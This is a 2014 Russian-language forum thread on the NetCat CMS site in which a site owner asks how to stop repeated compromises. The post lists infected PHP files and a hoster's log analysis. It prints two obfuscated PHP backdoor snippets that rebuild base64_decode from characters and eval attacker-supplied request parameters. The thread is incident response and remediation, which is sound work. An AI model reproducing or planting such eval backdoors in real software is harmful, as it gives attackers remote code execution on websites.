Профиль и настройки
Заказы Лицензии Техническая поддержка Выйти
Регистрация
Регистрируясь, вы подтверждаете свое согласие с соглашением об использовании персональных данных.
Восстановление пароля
Вход
на Главную /  Разработчикам /  Форум /  Общие вопросы

Взлом 5.4

12.11.2014, 12:20
Senja

Зарегистрирован:
2011-06-28
Сообщений: 6

 		Последнее время часто стали взламывать сайт и вставлять коды для спам рассылки с сайтагрустный

Хостер и Тех.поддержка Неткат говорят что с их стороны все идеально.

Вот последний список файлов:

//httpdocs/netcat/editors/ckeditor4/plugins/pastefromword/title.php
//httpdocs/netcat_template/module/search/mobile/help.php
//httpdocs/netcat/require/s_browse.inc.php
//httpdocs/netcat/require/s_files.inc.php
//httpdocs/netcat/require/lib/writeexcel/example-demo.php
//httpdocs/netcat/require/lib/dompdf/lib/php-font-lib/classes/Font_Table_hhea.php
//httpdocs/netcat/require/lib/dompdf/include/option.php
//httpdocs/netcat/require/lib/dompdf/include/table_row_group_renderer.cls.php
//httpdocs/netcat/require/lib/excel/PHPExcel/RichText/footer.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Shared/OLERead.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Shared/PCLZip/pclzip.lib.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Shared/JAMA/LUDecomposition.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Reader/Excel5.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Reader/Excel2007/dirs.php
//httpdocs/netcat/require/lib/excel/PHPExcel/CachedObjectStorage/DiscISAM.php
//httpdocs/netcat/require/lib/excel/PHPExcel/Writer/PDF/Core.php
//httpdocs/netcat/require/lib/Auth/OpenID/Server.php
//httpdocs/netcat/require/lib/Auth/OpenID/Consumer.php
//httpdocs/netcat/require/lib/Auth/OpenID/DumbStore.php
//httpdocs/netcat/require/lib/Auth/OpenID/gallery.php
//httpdocs/netcat/editors/ckeditor4/plugins/a11yhelp/template.php
//httpdocs/netcat/editors/ckeditor4/filemanager/connectors/php/inc/vendor/wideimage/lib/Operation/CopyChannelsPalette.php
//httpdocs/netcat/editors/ckeditor4/filemanager/scripts/jquery.crop/config.php
//httpdocs/netcat/editors/ckeditor4/header.php
//httpdocs/netcat/full.php
//httpdocs/netcat/modules/default/function.inc.php
//httpdocs/netcat/modules/routing/classes/pattern/part/string.php
//httpdocs/netcat/modules/routing/classes/pattern/part/user.php
//httpdocs/netcat/modules/search/lib/language/filter/normalize.php
//httpdocs/netcat/modules/search/lib/indexer/runner.php
//httpdocs/netcat/modules/search/lib/3rdparty/phpmorphy/article.php
//httpdocs/netcat/modules/search/lib/document/parser/dir.php
//httpdocs/netcat/modules/search/lib/document/parser/include.php
//httpdocs/netcat/modules/search/views/functions.php
//httpdocs/netcat/modules/stats/openstat/function.inc.php
//httpdocs/netcat/modules/stats/function.inc.php
//httpdocs/netcat/modules/captcha/player/themes.php
//httpdocs/netcat/tmp/netcat.sql
//httpdocs/netcat/system/backup/types/nc_backup_widget_class.class.php
//httpdocs/img/ini.php


Я сверил с исходными файлами и половину просто удалил.

В эти файлы в самом верху били вставлены коды:
Код:
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n513f0f'];if(isset($s22)){eval($s21($s22));}


Код:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qa04af1'])){eval(${$s20}['qa04af1']);}


Может кто подскажет как обезопасить от повторных взломов?
Кроме уже выполненных действий:
Смена паролей, удаление вред.кода и лишних файлов

Senja
02.12.2014, 00:28
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546
Цитата:
Может кто подскажет как обезопасить от повторных взломов?

Если до сих пор повторяется - отпишитесь мне на diggy@yandex.ru я посмотрю.

Temet nosce...
25.12.2014, 09:41
Гость
Гость

 		на сайте есть плагин REVOLUTION SLIDER версии ниже чем 4.2?
Если да, то проблема в нём.
30.12.2014, 14:21
Senja

Зарегистрирован:
2011-06-28
Сообщений: 6

 		Вот опять :
В данный момент можно выяснить следующее:
1) Было отправлено письмо, в заголовках письма при этом есть информация и о времени отправки письма, и о скрипте, с помощью которого оно было отправлено:
X-PHP-Script: /netcat_files/t/option.php for 80.69.171.3
Date: Sat, 27 Dec 2014 19:45:58 +0300 (MSK)

Этому письму соответствует обращение к Вашему сайту:
80.69.171.3 - - [27/Dec/2014:19:45:56 +0300] "POST /netcat_files/t/option.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

2) Поскольку известно имя и местоположение вредоносного скрипта, можно проверить дату изменений файла: Dec 27 00:12 (UTC). Этому моменты соответствуют следующие записи в журнале запросов сайта:
185.26.122.180 - - [27/Dec/2014:03:11:59 +0300] "POST /netcat/require/lib/writeexcel/example-panes.php HTTP/1.0" 200 366 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
185.26.122.180 - - [27/Dec/2014:03:12:03 +0300] "GET /netcat_files/t/option.php HTTP/1.0" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

Фактически это загрузка постороннего файла и проверка результата.
Данный скрипт содержит посторонний код и при этом редактировался еще 6 ноября. Таким образом, сайт был взломан очень давно. Наиболее вероятная причина - использование старого ckeditor.

Все скрипты, к которым производились POST-запросы с 11 декабря:

-rw-r--r-- 1 p6647 psacln 14K Dec 16 10:09 netcat/admin/patch/index.php
-rw-r--r-- 1 p6647 psacln 3.8K Aug 31 06:21 netcat/admin/report/system.php
-rw-r--r-- 1 p6647 psacln 2.7K Nov 12 06:45 netcat/editors/ckeditor4/filemanager/connectors/php/inc/vendor/wideimage/lib/Operation/CopyChannelsPalette.php
---------- 1 p6647 psacln 64K Dec 13 03:30 netcat/editors/ckeditor4/plugins/scayt/dialogs/javascript.php
-rw-r--r-- 1 p6647 psacln 43K Dec 16 10:09 netcat/full.php
-rw-r--r-- 1 p6647 psacln 42K Dec 16 10:09 netcat/message.php
-rw-r--r-- 1 p6647 psacln 2.4K Dec 2 10:41 netcat/modules/routing/admin_tree.php
-rw-r--r-- 1 p6647 psacln 922 Nov 12 06:51 netcat/modules/routing/classes/pattern/part/string.php
-rw-r--r-- 1 p6647 psacln 26K Dec 2 10:45 netcat/modules/stats/en.lang.php
-rw-r--r-- 1 p6647 psacln 9.6K Nov 6 17:15 netcat/require/lib/dompdf/include/canvas.cls.php
-rw-r--r-- 1 p6647 psacln 6.8K Nov 12 06:35 netcat/require/lib/excel/PHPExcel/CachedObjectStorage/DiscISAM.php
-rw-r--r-- 1 p6647 psacln 6.4K Nov 12 06:30 netcat/require/lib/excel/PHPExcel/Shared/JAMA/LUDecomposition.php
-rw-r--r-- 1 p6647 psacln 199K Nov 12 06:29 netcat/require/lib/excel/PHPExcel/Shared/PCLZip/pclzip.lib.php
-rw-r--r-- 1 p6647 psacln 15K Nov 12 06:36 netcat/require/lib/excel/PHPExcel/Writer/PDF/Core.php
-rw-r--r-- 1 p6647 psacln 3.2K Nov 12 06:14 netcat/require/lib/writeexcel/example-demo.php
-rw-r--r-- 1 p6647 psacln 3.5K Nov 6 17:15 netcat/require/lib/writeexcel/example-panes.php
-rw-r--r-- 1 p6647 psacln 4.0K Dec 16 10:09 netcat/system/a2f/nc_a2f_field_select.class.php
-rw-r--r-- 1 p6647 psacln 5.4K Dec 16 10:09 netcat/system/backup/types/nc_backup_widget_class.class.php
-rw-r--r-- 1 p6647 psacln 63K Dec 27 00:12 netcat_files/t/option.php

Их необходимо проверить в первую очередь, поскольку среди них могут быть вредоносные.

Это ответ от хостера.

Senja
198 196 2014-12-30 14:21:48 13901
Описание проекта
Сохранить и свернуть